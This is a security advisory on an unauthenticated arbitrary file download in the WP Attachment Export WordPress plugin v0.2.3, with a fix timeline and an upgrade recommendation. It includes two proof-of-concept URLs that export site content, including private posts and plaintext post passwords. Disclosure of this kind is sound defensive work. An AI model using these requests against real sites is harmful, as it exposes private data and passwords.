WordPress WP Attachment Export 0.2.3 Arbitrary File Download

`# Title: Arbitrary File Download in WP Attachment Export Wordpress Plugin  
v0.2.3  
# Submitter: Nitin Venkatesh  
# Product: WP Attachment Export Wordpress Plugin  
# Product URL: https://wordpress.org/plugins/wp-attachment-export/  
# Vulnerability Type: Arbitrary File Download  
# Affected Versions: v0.2.3  
# Tested versions: v0.2.3  
# Fixed Version: v0.2.4  
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1170732/  
# Changelog: https://wordpress.org/plugins/wp-attachment-export/changelog/  
# CVE Status: None/Unassigned/Fresh  
  
## Product Information:  
  
WP Attachment Export allows you to export your media library into a  
WordPress eXtended RSS or WXR file. You can then use the Tools->Import  
function in another WordPress installation to import the media library.  
  
## Vulnerability Description:  
  
The WP Attachment Export Wordpress Plugin v0.2.3 is susceptible to  
Arbitrary File Download wherein anyone(unauthenticated user) could download  
the XML data that holds all the details of attachments/posts on a Wordpress  
powered site. This includes details of even privately published posts and  
password protected posts with their passwords revealed in plain text.  
  
## Proof-of-Concept:  
  
Download attachment details:  
http://localhost/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true  
  
Download Wordpress content details:  
http://localhost/wp-admin/tools.php?content=&wp-attachment-export-download=true  
  
## Solution:  
  
Upgrade to v0.2.4 of the plugin.  
  
## Disclosure Timeline:  
  
2015-05-30 - Mailed report to developer  
2015-05-30 - Updated v0.2.4 released  
2015-07-14 - Publishing disclosure on FD.  
  
## Disclaimer:  
  
This disclosure is purely meant for educational purposes. I will in no way  
be responsible as to how the information in this disclosure is used.  
  
  
`